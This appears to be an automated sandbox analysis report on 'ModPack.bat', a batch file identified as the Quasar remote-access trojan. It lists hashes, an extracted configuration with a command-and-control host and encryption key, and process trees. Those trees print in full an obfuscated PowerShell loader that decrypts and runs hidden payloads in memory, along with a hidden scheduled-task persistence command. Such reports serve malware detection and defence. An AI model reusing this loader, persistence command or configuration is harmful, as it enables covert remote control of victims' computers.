Analysis

  • max time kernel
    36s
  • max time network
    40s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-04-2024 20:25

General

  • Target

    ModPack.bat

  • Size

    1.6MB

  • MD5

    3ab2a7793b323765353fa8e597cec156

  • SHA1

    c892cc5095ac6f37d0e94bbc09e11abe3d62027a

  • SHA256

    a2c3928e33f47ec7dd1caf488af3aecd0e829031740dda298513ef24795bad54

  • SHA512

    90c1a411b9b9cbcef33cc80c0f746ee67501e21998c8a85c7af868da450a8f7ab2a405562b3e9c9e26f77a4a75b9532d30816f20865dfdd29c555882ea72abcc

  • SSDEEP

    24576:zVHGMbIfHrrVuAAJ1wVKTV9QzlkWMGyR7mgVvIhiMej1Ma:pHEvrroBVykjea

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

notes-creation.gl.at.ply.gg:27030

Mutex

6735a92b-88d2-4fbe-8e59-605a85072109

Attributes
  • encryption_key

    8681483EF512C654BECF205A0D74FFCA4B129A98

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Trapix Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModPack.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4916
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WHU9LIZZZnpXvmHPYv+jvQzDV7636Q84bvp2wMYdDEY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WBD6QKFaFapBAwUbctfeFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XGRxz=New-Object System.IO.MemoryStream(,$param_var); $eoWcZ=New-Object System.IO.MemoryStream; $ZKHsZ=New-Object System.IO.Compression.GZipStream($XGRxz, [IO.Compression.CompressionMode]::Decompress); $ZKHsZ.CopyTo($eoWcZ); $ZKHsZ.Dispose(); $XGRxz.Dispose(); $eoWcZ.Dispose(); $eoWcZ.ToArray();}function execute_function($param_var,$param2_var){ $aqZjX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tUwTg=$aqZjX.EntryPoint; $tUwTg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModPack.bat';$qeekY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModPack.bat').Split([Environment]::NewLine);foreach ($hvTHj in $qeekY) { if ($hvTHj.StartsWith(':: ')) { $YbvrY=$hvTHj.Substring(3); break; }}$payloads_var=[string[]]$YbvrY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4876
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_737_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_737.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3024
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_737.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4364
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_737.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3868
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WHU9LIZZZnpXvmHPYv+jvQzDV7636Q84bvp2wMYdDEY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WBD6QKFaFapBAwUbctfeFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XGRxz=New-Object System.IO.MemoryStream(,$param_var); $eoWcZ=New-Object System.IO.MemoryStream; $ZKHsZ=New-Object System.IO.Compression.GZipStream($XGRxz, [IO.Compression.CompressionMode]::Decompress); $ZKHsZ.CopyTo($eoWcZ); $ZKHsZ.Dispose(); $XGRxz.Dispose(); $eoWcZ.Dispose(); $eoWcZ.ToArray();}function execute_function($param_var,$param2_var){ $aqZjX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tUwTg=$aqZjX.EntryPoint; $tUwTg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_737.bat';$qeekY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_737.bat').Split([Environment]::NewLine);foreach ($hvTHj in $qeekY) { if ($hvTHj.StartsWith(':: ')) { $YbvrY=$hvTHj.Substring(3); break; }}$payloads_var=[string[]]$YbvrY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            PID:4728

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    f0e4d6a27f7384e815df7e7d9f26794e

    SHA1

    ec71de77f95d30bce9ddfe8ff9850fd2e380c1c9

    SHA256

    bd116cb8748ba555139eb27150521271147442db63776ce75feb039437033fc9

    SHA512

    8b8d32e2acefba80099db5731e504f799d7a784c30ad7ed4b6bc21060431f51b7821b9c9daae71b5ca8343fa2e551d580e397b572ea56872dafce74d0bd27f49

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dak5qplk.p5w.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\startup_str_737.bat

    Filesize

    1.6MB

    MD5

    3ab2a7793b323765353fa8e597cec156

    SHA1

    c892cc5095ac6f37d0e94bbc09e11abe3d62027a

    SHA256

    a2c3928e33f47ec7dd1caf488af3aecd0e829031740dda298513ef24795bad54

    SHA512

    90c1a411b9b9cbcef33cc80c0f746ee67501e21998c8a85c7af868da450a8f7ab2a405562b3e9c9e26f77a4a75b9532d30816f20865dfdd29c555882ea72abcc

  • C:\Users\Admin\AppData\Roaming\startup_str_737.vbs

    Filesize

    115B

    MD5

    450a84f4d8cc45a1b6c1ce4b4e5ac076

    SHA1

    bad873d699d7c54bff2477fab4aa9223023b960e

    SHA256

    7dbda282c9889eb142bf745e6f1744d34be16ec9f3eac6560dc30329a44a45ff

    SHA512

    907b7e7473651ef197c38418af8f24f3d40e43f65d634d4c35990d1e82443b6efa04410b74342cb5b837d94e889b1e16a0299b42ed8e89574cfe4f8204ae40b5

  • memory/3024-25-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

    Filesize

    10.8MB

  • memory/3024-28-0x0000022A9FBC0000-0x0000022A9FBD0000-memory.dmp

    Filesize

    64KB

  • memory/3024-31-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

    Filesize

    10.8MB

  • memory/3024-26-0x0000022A9FBC0000-0x0000022A9FBD0000-memory.dmp

    Filesize

    64KB

  • memory/3024-27-0x0000022A9FBC0000-0x0000022A9FBD0000-memory.dmp

    Filesize

    64KB

  • memory/4728-40-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

    Filesize

    10.8MB

  • memory/4728-57-0x000002B6F3C00000-0x000002B6F3DC2000-memory.dmp

    Filesize

    1.8MB

  • memory/4728-62-0x000002B6F0880000-0x000002B6F0890000-memory.dmp

    Filesize

    64KB

  • memory/4728-61-0x000002B6F0880000-0x000002B6F0890000-memory.dmp

    Filesize

    64KB

  • memory/4728-60-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

    Filesize

    10.8MB

  • memory/4728-59-0x000002B6F35D0000-0x000002B6F360C000-memory.dmp

    Filesize

    240KB

  • memory/4728-58-0x000002B6F34F0000-0x000002B6F3502000-memory.dmp

    Filesize

    72KB

  • memory/4728-41-0x000002B6F0880000-0x000002B6F0890000-memory.dmp

    Filesize

    64KB

  • memory/4728-56-0x000002B6F3650000-0x000002B6F3702000-memory.dmp

    Filesize

    712KB

  • memory/4728-53-0x000002B6F2C30000-0x000002B6F2F54000-memory.dmp

    Filesize

    3.1MB

  • memory/4728-54-0x000002B6F0880000-0x000002B6F0890000-memory.dmp

    Filesize

    64KB

  • memory/4728-55-0x000002B6F3540000-0x000002B6F3590000-memory.dmp

    Filesize

    320KB

  • memory/4876-52-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

    Filesize

    10.8MB

  • memory/4876-2-0x000002D19D6A0000-0x000002D19D6C2000-memory.dmp

    Filesize

    136KB

  • memory/4876-14-0x000002D1B7990000-0x000002D1B7AC2000-memory.dmp

    Filesize

    1.2MB

  • memory/4876-6-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

    Filesize

    10.8MB

  • memory/4876-11-0x000002D19D590000-0x000002D19D5A0000-memory.dmp

    Filesize

    64KB

  • memory/4876-12-0x000002D19D590000-0x000002D19D5A0000-memory.dmp

    Filesize

    64KB

  • memory/4876-13-0x000002D1B7980000-0x000002D1B7988000-memory.dmp

    Filesize

    32KB